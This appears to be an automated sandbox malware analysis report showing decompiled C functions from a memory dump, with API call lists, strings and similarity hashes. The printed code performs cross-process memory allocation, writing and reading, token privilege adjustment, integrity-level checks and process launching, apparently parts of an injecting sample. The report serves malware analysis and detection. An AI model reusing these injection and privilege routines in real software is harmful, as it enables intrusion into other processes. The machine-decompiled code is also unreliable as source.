0x005cae09
0x00000000
0x00000000
0x005cae0b
0x005cae11
0x005cae17
0x005cae1a
0x00000000
0x00000000
0x00000000
0x005cae1a
0x005cae1e
0x005cae24
0x00000000
0x005cae24
0x005cadd3
0x005cadd3
0x00000000
0x005cadd3
0x005caddf
0x005cade3
0x005cade5
0x005cade9
0x005cadef
0x005cadf4
0x005cadf4
0x00000000
0x005cade5
0x00000000
0x005cad8c
0x005cad8e
0x005cad92
0x005cad94
0x005cad98
0x005cad9e
0x005cada3
0x005cada3
0x00000000
0x005cad94
0x005cace4
0x005cace6
0x005cace6
0x005cace8
0x005caceb
0x00000000
0x00000000
0x005cacf0
0x005cacf3
0x00000000
0x00000000
0x005cacf5
0x005cacf5
0x005cacf6
0x005cacf6
0x00000000
0x00000000
0x00000000
0x00000000
0x005caccf
0x005caccf
0x005cacd4
0x005cacd7
0x00000000
0x00000000
0x005cacd9
0x005cacda
0x005cacdc
0x00000000
0x00000000
0x00000000
0x005cacdc
0x00000000
0x005caccf
0x005cac28
0x005cac49
0x005cac49
0x005cac4f
0x005cac52
0x005cac57
0x005cac57
0x005cac5a
0x005cac60
0x005cac63
0x005cac68
0x005cac68
0x005cac6b
0x005cac71
0x005cac74
0x005cac79
0x005cac79
0x005cac7c
0x005cac82
0x005cac85
0x005cac8a
0x005cac8a
0x005cac91
0x005caca3

APIs

Part of subcall function 005CD8B0: InitializeCriticalSectionAndSpinCount.KERNEL32(005D9B64,00000800,?,00000000,00000000,00000000,00000000), ref: 005CD916
Part of subcall function 005CD8B0: RtlEnterCriticalSection.NTDLL(005D9B64), ref: 005CD928
Part of subcall function 005CD8B0: RtlLeaveCriticalSection.NTDLL(005D9B64), ref: 005CD93C

Part of subcall function 005CC380: MultiByteToWideChar.KERNEL32(00000000,00000000,0000FDE9,00000000,00000000,00000000,00000000,00000000,?,00000010,005C8EF7,?,0000FDE9,00000010,000000FF,00000010), ref: 005CC396
Part of subcall function 005CC380: MultiByteToWideChar.KERNEL32(?,00000000,0000FDE9,?,00000000,00000000), ref: 005CC3C4

Sleep.KERNEL32(00004E20,?,000001BB), ref: 005CAC3A
Sleep.KERNEL32(00007530,?,000001BB,?,?,?,?,?,?,?,000001BB), ref: 005CAD44
Sleep.KERNEL32(00007530,?,000001BB,?,?,?,?,?,?,?,000001BB), ref: 005CAD7F
Sleep.KERNEL32(00007530,?,?,?,000001BB,?,?,?,?,?,?,?,000001BB), ref: 005CADC6
Sleep.KERNEL32(00007530,?,?,?,?,?,000001BB,?,?,?,?,?,?,?,000001BB), ref: 005CAE11

Strings

afet, xrefs: 005CABED
.baz, xrefs: 005CABDD
ar, xrefs: 005CABD5
/r/s, xrefs: 005CABF5
rust, xrefs: 005CABE5

Memory Dump Source

Source File: 00000002.00000002.267364030.005C1000.00000020.00000001.sdmp, Offset: 005C0000, based on PE: true

Associated: 00000002.00000002.267358206.005C0000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.267382270.005D8000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.267389405.005DA000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5c0000_______.jbxd

Similarity

API ID: Sleep$CriticalSection$ByteCharMultiWide$CountEnterInitializeLeaveSpin
String ID: .baz$/r/s$afet$ar$rust
API String ID: 2543766595-2414577613
Opcode ID: 40fe8b4e04c26d6e6230fe2bc5a90611760b134e1160e3410be2111cb81331cc
Instruction ID: 72cf48a028fc88d76943f3fbb43539ff957cdb00bd110d7330aa4f760bcbec33
Opcode Fuzzy Hash: 40fe8b4e04c26d6e6230fe2bc5a90611760b134e1160e3410be2111cb81331cc
Instruction Fuzzy Hash: 4B71A0B160430A9FD720ABB59C49F6BBFAABF90708F04481DF48696192EB34DD44C757

Uniqueness

Uniqueness Score: -1.00%

Function 005CC110, Relevance: 12.2, APIs: 8, Instructions: 204
stringCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E005CC110(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, void* _a16, intOrPtr _a20) {
				char _v20;
				long _v24;
				void* _v28;
				void* _v32;
				void* _v36;
				void* _t47;
				void* _t50;
				void* _t51;
				void* _t52;
				void* _t66;
				signed int _t67;
				void* _t70;
				intOrPtr _t73;
				void* _t74;
				void* _t76;
				DWORD* _t77;
				DWORD* _t80;
				intOrPtr _t83;
				void* _t84;
				void* _t85;
				intOrPtr _t86;
				void* _t87;
				void* _t89;
				long* _t90;
				long* _t91;

				_t90 =  &_v24;
				 *_t90 = 0;
				if( *((intOrPtr*)(__ecx + 0x80)) == 0) {
					L44:
					return 0;
				}
				_t88 = _a8;
				_t73 = _a12;
				_t87 = __ecx;
				if(_a8 != 0 || _t73 == 0) {
					_t83 = _a4;
					_t47 = 0;
					_v36 = 0;
					if(_t83 == 0) {
						L5:
						_v28 = _t47;
						if(_t73 == 0) {
							L7:
							_t84 = _a16;
							_t76 = 0;
							_t89 = 0;
							if(_t84 == 0) {
								L9:
								_t48 = _a20;
								if(_a20 == 0) {
									L19:
									_push(0);
									_push( *((intOrPtr*)(_t87 + 0x94)));
									_push( *((intOrPtr*)(_t87 + 0x9c)));
									_v32 = _t76;
									_push(_t76);
									_push(_t89);
									_push(_t73);
									_push(_v36);
									_push(_v28);
									_push(_t90);
									_push(8);
									_push( *((intOrPtr*)(_t87 + 0xa0)));
									_push(_t87);
									_t50 = E005D3FA0();
									_t91 =  &(_t90[0xc]);
									if(_t50 == 0) {
										_t74 = _t84;
										L31:
										_t51 = _v32;
										if(_t51 != 0) {
											VirtualFreeEx( *(_t87 + 0x70), _t51, 0, 0x8000);
										}
										_t84 = _t74;
										L34:
										if(_t89 != 0) {
											_t77 =  &_v20;
											 *_t77 = 0;
											if(ReadProcessMemory( *(_t87 + 0x70), _t89, _t84, 0x400, _t77) == 0 || _v20 != 0x400) {
												 *_t91 = 0;
											}
											VirtualFreeEx( *(_t87 + 0x70), _t89, 0, 0x8000);
										}
										L39:
										if(_v36 != 0) {
											VirtualFreeEx( *(_t87 + 0x70), _v36, 0, 0x8000);
										}
										L41:
										_t52 = _v28;
										if(_t52 != 0) {
											VirtualFreeEx( *(_t87 + 0x70), _t52, 0, 0x8000);
										}
										L43:
										return  *_t91;
									}
									 *(_t87 + 0x44) =  *_t91;
									if(_t89 != 0) {
										_t80 =  &_v24;
										 *_t80 = 0;
										if(ReadProcessMemory( *(_t87 + 0x70), _t89, _t84, 0x400, _t80) == 0 || _v24 != 0x400) {
											 *_t91 = 0;
										}
										VirtualFreeEx( *(_t87 + 0x70), _t89, 0, 0x8000);
									}
									_t74 = _t84;
									_t85 = 0;
									while(1) {
										_push(1);
										if(E005D5020(_t87, 0) != 0) {
											break;
										}
										_t85 = _t85 + 1;
										if(_t85 < 2) {
											continue;
										}
										_t89 = 0;
										_t115 = _t85 - 2;
										if(_t85 == 2) {
											goto L31;
										}
										break;
									}
									E005C76A0(_t87, _t115);
									_t89 = 0;
									goto L31;
								}
								_t66 = E005C9CD0(_t48,  *(_t87 + 0x70), _t48, 0x184);
								_t91 =  &(_t90[3]);
								if(_t66 == 0) {
									goto L34;
								}
								_t76 = _t66;
								_t86 =  *((intOrPtr*)(_a20 + 0x180));
								if(_t86 == 0) {
									L18:
									_t84 = _a16;
									goto L19;
								} else {
									_t67 = 0;
									L13:
									L13:
									if( *((short*)(_t86 + _t67 * 2)) == 0) {
										__eflags = _t67;
										if(_t67 != 0) {
											_v32 = _t76;
											 *((intOrPtr*)(_a20 + 0x180)) = E005C9CD0(_t67,  *(_t87 + 0x70), _t86, _t67);
											E005C91E0(_t86);
											_t76 = _v32;
											_t90 =  &(_t91[4]);
										}
									} else {
										goto L14;
									}
									goto L18;
									L14:
									_t67 = _t67 + 1;
									if(_t67 != 0x7fffffff) {
										goto L13;
									} else {
										goto L18;
									}
								}
							}
							_t70 = E005C9CD0(_t47,  *(_t87 + 0x70), _t84, 0x400);
							_t76 = 0;
							_t91 =  &(_t90[3]);
							_t89 = _t70;
							if(_t70 == 0) {
								goto L39;
							}
							goto L9;
						}
						_t47 = E005C9CD0(_t47,  *(_t87 + 0x70), _t88, _t73);
						_t91 =  &(_t90[3]);
						_v36 = _t47;
						if(_t47 == 0) {
							goto L41;
						}
						goto L7;
					}
					_t47 = E005C9CD0( *0x5d9d28(_t83) + 1,  *(_t87 + 0x70), _t83, 0);
					_t91 =  &(_t90[3]);
					if(0 == 0) {
						goto L43;
					}
					goto L5;
				} else {
					goto L44;
				}
			}

0x005cc114
0x005cc119
0x005cc122
0x005cc37c
0x005cc37c
0x005cc37c
0x005cc128
0x005cc12c
0x005cc130
0x005cc134
0x005cc13e
0x005cc142
0x005cc147
0x005cc151
0x005cc170
0x005cc172
0x005cc176
0x005cc191
0x005cc191
0x005cc195
0x005cc197
0x005cc19e
0x005cc1bd
0x005cc1bd
0x005cc1c3
0x005cc231
0x005cc233
0x005cc235
0x005cc23b
0x005cc241
0x005cc245
0x005cc246
0x005cc247
0x005cc248
0x005cc24c
0x005cc250
0x005cc251
0x005cc253
0x005cc259
0x005cc25a
0x005cc25f
0x005cc264
0x005cc2db
0x005cc2dd
0x005cc2dd
0x005cc2e3
0x005cc2f0
0x005cc2f0
0x005cc2f6
0x005cc2f8
0x005cc2fa
0x005cc2ff
0x005cc303
0x005cc31a
0x005cc326
0x005cc326
0x005cc338
0x005cc338
0x005cc33e
0x005cc343
0x005cc353
0x005cc353
0x005cc359
0x005cc359
0x005cc35f
0x005cc36c
0x005cc36c
0x005cc372
0x00000000
0x005cc372
0x005cc26b
0x005cc26e
0x005cc273
0x005cc277
0x005cc28e
0x005cc29a
0x005cc29a
0x005cc2ac
0x005cc2ac
0x005cc2b2
0x005cc2b4
0x005cc2b6
0x005cc2b8
0x005cc2c1
0x00000000
0x00000000
0x005cc2c3
0x005cc2c7
0x00000000
0x00000000
0x005cc2c9
0x005cc2cb
0x005cc2ce
0x00000000
0x00000000
0x00000000
0x005cc2ce
0x005cc2d2
0x005cc2d7
0x00000000
0x005cc2d7
0x005cc1ce
0x005cc1d3
0x005cc1d8
0x00000000
0x00000000
0x005cc1e2
0x005cc1e4
0x005cc1ec
0x005cc22d
0x005cc22d
0x00000000
0x005cc1ee
0x005cc1ee
0x00000000
0x005cc1f0
0x005cc1f5
0x005cc201
0x005cc203
0x005cc20a
0x005cc21a
0x005cc221
0x005cc226
0x005cc22a
0x005cc22a
0x00000000
0x00000000
0x00000000
0x00000000
0x005cc1f7
0x005cc1f7
0x005cc1fd
0x00000000
0x005cc1ff
0x00000000
0x005cc1ff
0x005cc1fd
0x005cc1ec
0x005cc1a9
0x005cc1ae
0x005cc1b0
0x005cc1b3
0x005cc1b7
0x00000000
0x00000000
0x00000000
0x005cc1b7
0x005cc17d
0x005cc182
0x005cc187
0x005cc18b
0x00000000
0x00000000
0x00000000
0x005cc18b
0x005cc160
0x005cc165
0x005cc16a
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000

APIs

lstrlen.KERNEL32(?), ref: 005CC154
ReadProcessMemory.KERNEL32(?,?,?,00000400,?), ref: 005CC286
VirtualFreeEx.KERNEL32(?,?,00000000,00008000), ref: 005CC2AC
VirtualFreeEx.KERNEL32(?,?,00000000,00008000), ref: 005CC2F0
ReadProcessMemory.KERNEL32(?,?,?,00000400,?), ref: 005CC312
VirtualFreeEx.KERNEL32(?,?,00000000,00008000), ref: 005CC338
VirtualFreeEx.KERNEL32(?,?,00000000,00008000), ref: 005CC353
VirtualFreeEx.KERNEL32(?,?,00000000,00008000), ref: 005CC36C

Part of subcall function 005C9CD0: VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040,00000000,?,00000000,?,?,005CDA93,?,?,00000080), ref: 005C9CE8
Part of subcall function 005C9CD0: WriteProcessMemory.KERNEL32(?,00000000,?,?,?,?,00000000,?,?,005CDA93,?,?,00000080), ref: 005C9D07

Part of subcall function 005C91E0: RtlFreeHeap.NTDLL(00000008,?,005C9F64), ref: 005C91F1

Memory Dump Source

Source File: 00000002.00000002.267364030.005C1000.00000020.00000001.sdmp, Offset: 005C0000, based on PE: true

Associated: 00000002.00000002.267358206.005C0000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.267382270.005D8000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.267389405.005DA000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5c0000_______.jbxd

Similarity

API ID: FreeVirtual$MemoryProcess$Read$AllocHeapWritelstrlen
String ID:
API String ID: 2758599655-0
Opcode ID: 9f926145fae4058482084b8172112e67c8e8707971476fed0b23f84ba25455af
Instruction ID: d18980752fca79ac02a0b8d658d0b265b20874ea41dab6d7d13709c8f7f4772d
Opcode Fuzzy Hash: 9f926145fae4058482084b8172112e67c8e8707971476fed0b23f84ba25455af
Instruction Fuzzy Hash: EA619E74604701AFE7219BA5DC09F2BBFE9FB80704F14482DFA99962A1EB71EC01DB51

Uniqueness

Uniqueness Score: -1.00%

Function 005C5150, Relevance: 12.1, APIs: 8, Instructions: 125
processCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E005C5150(void* __ecx, void* __eflags) {
				intOrPtr _t26;
				intOrPtr _t27;
				void* _t29;
				void* _t30;
				WCHAR* _t36;
				void* _t37;
				int _t38;
				intOrPtr _t39;
				WCHAR* _t44;
				struct _PROCESS_INFORMATION* _t46;
				struct _STARTUPINFOW* _t52;
				void* _t53;
				WCHAR* _t57;
				struct _STARTUPINFOW* _t58;
				LPWSTR* _t59;
				WCHAR** _t60;
				intOrPtr _t62;

				_t47 = __ecx;
				_t53 = __ecx;
				_t52 = _t58;
				E005D6610(_t52, 0, 0x530);
				_t59 =  &(_t58->lpTitle);
				_t62 =  *0x5d9ae8; // 0x0
				if(_t62 == 0) {
					_push(0);
					return E005C43E0(_t53, __eflags);
				}
				E005C8CD0(_t47);
				_t60 =  &(_t59[1]);
				_t44 =  &(_t60[0x1a]);
				 *_t44 = 0;
				 *(_t44 - 0xc) = _t44;
				_t26 =  *0x5d9de4(0, 0x1c,  *((intOrPtr*)(_t44 - 0x10)), 0, _t44,  &(_t59[0x16]));
				_t63 = _t26;
				 *((intOrPtr*)(_t44 - 8)) = _t26;
				if(_t26 < 0) {
					_t60[0x17] = 0;
					_t27 = 0;
					__eflags = 0;
				} else {
					_t57 =  &(_t60[0x11a]);
					E005D4520(_t57, 0x78);
					_t60 =  &(_t60[2]);
					GetTempFileNameW(_t44, _t57, 0, _t44);
					_t27 =  *((intOrPtr*)(_t57 - 0x40c));
				}
				_push(0);
				_push(0);
				if(E005CFA90(_t53, _t63, _t27,  &(_t60[0x15]), 0) == 0) {
					L11:
					_t29 = _t60[0x11];
					if(_t29 != 0) {
						CloseHandle(_t29);
					}
					_t30 = _t60[0x12];
					if(_t30 != 0) {
						CloseHandle(_t30);
					}
					_t31 = _t60[0x15];
					if(_t60[0x15] != 0) {
						E005C91E0(_t31);
						_t60 =  &(_t60[1]);
					}
					return _t60[0x19];
				} else {
					_t36 = _t60[0x15];
					if(_t36 == 0) {
						goto L11;
					}
					_t46 =  &(_t60[0x11]);
					_push(0);
					_push(0);
					_push(0x420);
					_push(_t36);
					_push( &(_t60[0x12]));
					_t37 = E005C5470(_t46);
					_t60 =  &(_t60[6]);
					if(_t37 == 0) {
						 *_t60 = 0x44;
						GetStartupInfoW(_t52);
						_t38 = CreateProcessW(_t60[0x1e], 0, 0, 0, 0, 0, 0, 0, _t52, _t46);
						__eflags = _t38;
						if(_t38 == 0) {
							_t39 =  *0x5d9b0c; // 0x26f2b8
							 *((intOrPtr*)(_t39 + 8)) = 7;
							goto L11;
						}
						L10:
						_t60[0x19] = 1;
						goto L11;
					}
					CloseHandle(_t60[0x11]);
					CloseHandle(_t60[0x12]);
					goto L10;
				}
			}

0x005c5150
0x005c515a
0x005c515e
0x005c5167
0x005c516c
0x005c516f
0x005c5175
0x005c51cc
0x00000000
0x005c51ce
0x005c517c
0x005c5181
0x005c5184
0x005c5188
0x005c518d
0x005c5198
0x005c519e
0x005c51a0
0x005c51a3
0x005c51d8
0x005c51e0
0x005c51e0
0x005c51a5
0x005c51a5
0x005c51af
0x005c51b4
0x005c51bc
0x005c51c2
0x005c51c2
0x005c51ea
0x005c51eb
0x005c51f6
0x005c5261
0x005c5261
0x005c5267
0x005c526a
0x005c526a
0x005c5270
0x005c5276
0x005c5279
0x005c5279
0x005c527f
0x005c5285
0x005c5288
0x005c528d
0x005c528d
0x00000000
0x005c51f8
0x005c51f8
0x005c51fe
0x00000000
0x00000000
0x005c5200
0x005c520a
0x005c520b
0x005c520c
0x005c5211
0x005c5212
0x005c5214
0x005c5219
0x005c521e
0x005c5234
0x005c523c
0x005c524f
0x005c5255
0x005c5257
0x005c529f
0x005c52a4
0x00000000
0x005c52a4
0x005c5259
0x005c5259
0x00000000
0x005c5259
0x005c522a
0x005c5230
0x00000000
0x005c5230

APIs

Part of subcall function 005C8CD0: GetCurrentProcess.KERNEL32 ref: 005C8D0D
Part of subcall function 005C8CD0: OpenProcessToken.ADVAPI32(00000000,00000028), ref: 005C8D19
Part of subcall function 005C8CD0: LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 005C8D3A
Part of subcall function 005C8CD0: AdjustTokenPrivileges.ADVAPI32(00000000,00000000,?,00000010,?,?), ref: 005C8D68
Part of subcall function 005C8CD0: RevertToSelf.ADVAPI32 ref: 005C8DD9

SHGetFolderPathW.SHELL32(00000000,0000001C,?,00000000,?), ref: 005C5198
GetTempFileNameW.KERNEL32(?,?,00000000,?), ref: 005C51BC
CloseHandle.KERNEL32(?), ref: 005C522A
CloseHandle.KERNEL32(?), ref: 005C5230
GetStartupInfoW.KERNEL32 ref: 005C523C
CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 005C524F
CloseHandle.KERNEL32(?), ref: 005C526A
CloseHandle.KERNEL32(?), ref: 005C5279

Memory Dump Source

Source File: 00000002.00000002.267364030.005C1000.00000020.00000001.sdmp, Offset: 005C0000, based on PE: true

Associated: 00000002.00000002.267358206.005C0000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.267382270.005D8000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.267389405.005DA000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5c0000_______.jbxd

Similarity

API ID: CloseHandle$Process$Token$AdjustCreateCurrentFileFolderInfoLookupNameOpenPathPrivilegePrivilegesRevertSelfStartupTempValue
String ID:
API String ID: 2859521768-0
Opcode ID: 829939c596b33584a22eebb876ee542050536d28955dd108e985d577321dcd52
Instruction ID: 4708b2b29a5c7c788e4bd9241ebc8e3a23195462a1a0930215dca746f112340e
Opcode Fuzzy Hash: 829939c596b33584a22eebb876ee542050536d28955dd108e985d577321dcd52
Instruction Fuzzy Hash: 5231A275604304AFEB209BE1DC89F2BBFECFB91784F04441EF94586290EA35EC48DA61

Uniqueness

Uniqueness Score: -1.00%

Function 005CCE40, Relevance: 12.1, APIs: 8, Instructions: 91
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E005CCE40(long _a4) {
				WCHAR* _v0;
				short _v536;
				union _SID_NAME_USE _v540;
				char _v544;
				WCHAR* _v548;
				void* _v552;
				void* _t16;
				void* _t20;
				void* _t25;
				DWORD* _t28;
				long _t29;
				DWORD* _t30;
				DWORD* _t34;
				long _t35;
				void* _t36;
				void* _t37;
				HANDLE* _t39;

				_t35 = 0;
				_v548 = 0;
				_t16 = OpenProcess(0x400, 0, _a4);
				if(_t16 == 0) {
					L13:
					return _t35;
				}
				_t37 = _t16;
				if(OpenProcessToken(_t37, 8, _t39) == 0) {
					L9:
					_t35 = 0;
					L10:
					_t20 = _v548;
					if(_t20 != 0) {
						CloseHandle(_t20);
					}
					CloseHandle(_t37);
					goto L13;
				}
				_t36 = 0;
				_t30 =  &_v544;
				 *_t30 = 0;
				if(GetTokenInformation(_v548, 1, 0, 0, _t30) == 0) {
					if(GetLastError() != 0x7a) {
						goto L9;
					}
					_t25 = E005C3180(_v548, 0);
					if(_t25 == 0) {
						goto L9;
					}
					_t36 = _t25;
				}
				if(GetTokenInformation(_v552, 1, _t36, _v548, _t30) == 0) {
					goto L9;
				}
				_t34 =  &_v548;
				_v0 = 0;
				 *_t34 = _a4;
				_t28 =  &_v544;
				 *_t28 = 0x100;
				 *_v0 = 0;
				_t29 = LookupAccountSidW(0,  *_t36, _v0, _t34,  &_v536, _t28,  &_v540);
				_t35 = _t29;
				if(_t29 != 0) {
					_t35 = _v548;
				}
				goto L10;
			}

0x005cce51
0x005cce53
0x005cce5d
0x005cce65
0x005ccf3a
0x005ccf46
0x005ccf46
0x005cce6b
0x005cce7b
0x005ccf23
0x005ccf23
0x005ccf25
0x005ccf25
0x005ccf2a
0x005ccf2d
0x005ccf2d
0x005ccf34
0x00000000
0x005ccf34
0x005cce81
0x005cce83
0x005cce87
0x005cce9a
0x005ccf08
0x00000000
0x00000000
0x005ccf10
0x005ccf1a
0x00000000
0x00000000
0x005ccf1c
0x005ccf1c
0x005cceb0
0x00000000
0x00000000
0x005ccec0
0x005cceca
0x005ccecd
0x005ccecf
0x005cced3
0x005cced9
0x005cceed
0x005ccef3
0x005ccef7
0x005ccef9
0x005ccef9
0x00000000

APIs

OpenProcess.KERNEL32(00000400,00000000,?), ref: 005CCE5D
OpenProcessToken.ADVAPI32(00000000,00000008), ref: 005CCE73
GetTokenInformation.ADVAPI32(00000000,00000001(TokenIntegrityLevel),00000000,00000000,?), ref: 005CCE92
GetTokenInformation.ADVAPI32(00000001,00000001(TokenIntegrityLevel),00000000,?,?), ref: 005CCEA8
LookupAccountSidW.ADVAPI32(00000000,00000000,?,?,?,?,?), ref: 005CCEED
GetLastError.KERNEL32 ref: 005CCEFF
CloseHandle.KERNEL32(00000000), ref: 005CCF2D
CloseHandle.KERNEL32(00000000), ref: 005CCF34

Memory Dump Source

Source File: 00000002.00000002.267364030.005C1000.00000020.00000001.sdmp, Offset: 005C0000, based on PE: true

Associated: 00000002.00000002.267358206.005C0000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.267382270.005D8000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.267389405.005DA000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5c0000_______.jbxd

Similarity

API ID: Token$CloseHandleInformationOpenProcess$AccountErrorLastLookup
String ID:
API String ID: 2338897050-0
Opcode ID: aa2923d4844f8afaa5b4982820c6b9c5e17ba5aa3247c7f852e2483adc24fdb1
Instruction ID: 56c4805373dabf74fac00c11bceb17d3424f005d79024ccaff1d36cba5c5444d
Opcode Fuzzy Hash: aa2923d4844f8afaa5b4982820c6b9c5e17ba5aa3247c7f852e2483adc24fdb1
Instruction Fuzzy Hash: EB312971205241AFD7219FA2DC88FABBFEDFF95740F04481EF44A862A0DB709809DB61

Uniqueness

Uniqueness Score: -1.00%

Function 005CB3F0, Relevance: 10.8, APIs: 7, Instructions: 254
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E005CB3F0(void* __ecx, intOrPtr* _a4, intOrPtr* _a8, void** _a12, long* _a16, intOrPtr* _a20) {
				intOrPtr _v20;
				void* _v24;
				long _v28;
				void* _v32;
				void* _v36;
				void* _v40;
				void _v44;
				char _v48;
				char _v52;
				char _v56;
				void* _v60;
				void* _v64;
				void* _v68;
				long _v72;
				intOrPtr _v76;
				void _v80;
				void _t65;
				long _t79;
				void* _t81;
				void* _t82;
				void* _t84;
				void* _t88;
				void* _t89;
				void* _t90;
				long _t91;
				void* _t93;
				void* _t97;
				void* _t100;
				void* _t103;
				intOrPtr* _t104;
				void* _t105;
				long _t106;
				intOrPtr _t110;
				long _t111;
				intOrPtr* _t131;
				void* _t132;
				DWORD* _t133;
				void* _t134;
				long* _t135;
				intOrPtr* _t136;
				DWORD* _t139;

				_t134 = __ecx;
				memset( &_v80, 0, 0x10 << 2);
				_t139 =  &(( &_v68)[3]);
				if( *((intOrPtr*)(_t134 + 0x80)) != 0) {
					_t79 = WaitForSingleObject( *(_t134 + 0x90), 0);
					_v72 = _t79;
					if(_t79 == 0x102) {
						_v76 = 1;
						_t81 = E005C3180(0x80, 0);
						_t132 = _t81;
						_v68 = _t81;
						_t82 = E005C3180(0x400, 0);
						_t105 = _t82;
						_v64 = _t82;
						_t84 = E005C3180(0x80, 0);
						_t139 =  &(_t139[6]);
						_v60 = _t84;
						if(_t84 != 0 && _t132 != 0 && _t105 != 0) {
							_t133 = _t139;
							 *_t133 = 0;
							if(ReadProcessMemory( *(_t134 + 0x70),  *((intOrPtr*)(_t134 + 0x94)) + 0x34,  &_v44, 0x1c, _t133) != 0 &&  *_t139 == 0x1c && _v20 ==  *((intOrPtr*)(_t134 + 0x94))) {
								_t88 = _v40;
								if(_t88 == 0) {
									L32:
									_t89 = _v36;
									if(_t89 == 0) {
										L36:
										_t90 = _v24;
										if(_t90 == 0) {
											L40:
											_t91 = _v28;
											if(_t91 == 0 || _v32 == 0) {
												 *_a12 = 0;
												goto L48;
											} else {
												if(_t91 <= 0x8000000) {
													_t93 = E005C3180(_t91, 0);
													_t139 =  &(_t139[2]);
													 *_a12 = _t93;
													if(_t93 != 0) {
														_t106 = _v28;
														 *_t139 = 0;
														if(ReadProcessMemory( *(_t134 + 0x70), _v32, _t93, _t106, _t133) != 0) {
															if( *_t139 == _t106) {
																L48:
																_v80 = 1;
															} else {
															}
														}
													}
												}
											}
										} else {
											 *_t139 = 0;
											if(ReadProcessMemory( *(_t134 + 0x70), _t90, _v60, 0x7f, _t133) == 0 ||  *_t139 != 0x7f) {
												goto L40;
											} else {
												 *((char*)( *((intOrPtr*)( &_v48 - 0xc)) + 0x7f)) = 0;
												_t97 = E005CC380( *((intOrPtr*)( &_v48 - 0xc)), 0,  &_v48, 0xffffffff);
												_t139 =  &(_t139[4]);
												if(_t97 != 0) {
													goto L40;
												}
											}
										}
									} else {
										 *_t139 = 0;
										if(ReadProcessMemory( *(_t134 + 0x70), _t89, _v64, 0x3ff, _t133) == 0 ||  *_t139 != 0x3ff) {
											goto L36;
										} else {
											 *((char*)( *((intOrPtr*)( &_v52 - 0xc)) + 0x3ff)) = 0;
											_t100 = E005CC380( *((intOrPtr*)( &_v52 - 0xc)), 0,  &_v52, 0xffffffff);
											_t139 =  &(_t139[4]);
											if(_t100 != 0) {
												goto L36;
											}
										}
									}
								} else {
									 *_t139 = 0;
									if(ReadProcessMemory( *(_t134 + 0x70), _t88, _v68, 0x7f, _t133) != 0 &&  *_t139 == 0x7f) {
										 *((char*)( *((intOrPtr*)( &_v56 - 0xc)) + 0x7f)) = 0;
										_t103 = E005CC380( *((intOrPtr*)( &_v56 - 0xc)), 0,  &_v56, 0xffffffff);
										_t139 =  &(_t139[4]);
										if(_t103 != 0) {
											goto L32;
										}
									}
								}
							}
						}
					}
				}
				if(_v76 != 0) {
					SetEvent( *(_t134 + 0x90));
				}
				_t62 = _v68;
				if(_v68 != 0) {
					E005C91E0(_t62);
					_t139 =  &(_t139[1]);
				}
				_t63 = _v64;
				if(_v64 != 0) {
					E005C91E0(_t63);
					_t139 =  &(_t139[1]);
				}
				_t64 = _v60;
				if(_v60 != 0) {
					E005C91E0(_t64);
					_t139 =  &(_t139[1]);
				}
				_t65 = _v80;
				_t131 = _a20;
				_t135 = _a16;
				_t104 = _a8;
				_t136 = _a4;
				_t110 = _v56;
				if(_t65 == 0) {
					if(_t110 != 0) {
						E005C91E0(_t110);
						_t139 =  &(_t139[1]);
					}
					_t66 = _v52;
					if(_v52 != 0) {
						E005C91E0(_t66);
						_t139 =  &(_t139[1]);
					}
					_t67 = _v48;
					if(_v48 != 0) {
						E005C91E0(_t67);
						_t139 =  &(_t139[1]);
					}
					_t69 =  *_a12;
					if( *_a12 != 0) {
						E005C91E0(_t69);
					}
					_t111 = 0;
					 *_t131 = 0;
					 *_t104 = 0;
					 *_t136 = 0;
					 *_a12 = 0;
					_t65 = _v80;
				} else {
					 *_t136 = _t110;
					 *_t104 = _v52;
					 *_t131 = _v48;
					_t111 = _v28;
				}
				 *_t135 = _t111;
				return _t65;
			}

0x005cb3f7
0x005cb404
0x005cb404
0x005cb40d
0x005cb41b
0x005cb426
0x005cb42a
0x005cb432
0x005cb441
0x005cb449
0x005cb44b
0x005cb455
0x005cb45d
0x005cb45f
0x005cb46a
0x005cb46f
0x005cb474
0x005cb478
0x005cb48b
0x005cb491
0x005cb4a8
0x005cb598
0x005cb59e
0x005cb5ed
0x005cb5ed
0x005cb5f3
0x005cb643
0x005cb643
0x005cb649
0x005cb690
0x005cb690
0x005cb696
0x005cb6f6
0x00000000
0x005cb69f
0x005cb6a4
0x005cb6ad
0x005cb6b2
0x005cb6bb
0x005cb6bd
0x005cb6c3
0x005cb6ce
0x005cb6e2
0x005cb6eb
0x005cb6fc
0x005cb6fc
0x00000000
0x005cb6ed
0x005cb6eb
0x005cb6e2
0x005cb6bd
0x005cb6a4
0x005cb64b
0x005cb652
0x005cb667
0x00000000
0x005cb66f
0x005cb676
0x005cb680
0x005cb685
0x005cb68a
0x00000000
0x00000000
0x005cb68a
0x005cb667
0x005cb5f5
0x005cb5fc
0x005cb614
0x00000000
0x005cb61f
0x005cb626
0x005cb633
0x005cb638
0x005cb63d
0x00000000
0x00000000
0x005cb63d
0x005cb614
0x005cb5a0
0x005cb5a7
0x005cb5bc
0x005cb5d3
0x005cb5dd
0x005cb5e2
0x005cb5e7
0x00000000
0x00000000
0x005cb5e7
0x005cb5bc
0x005cb59e
0x005cb4a8
0x005cb478
0x005cb42a
0x005cb4c5
0x005cb4cd
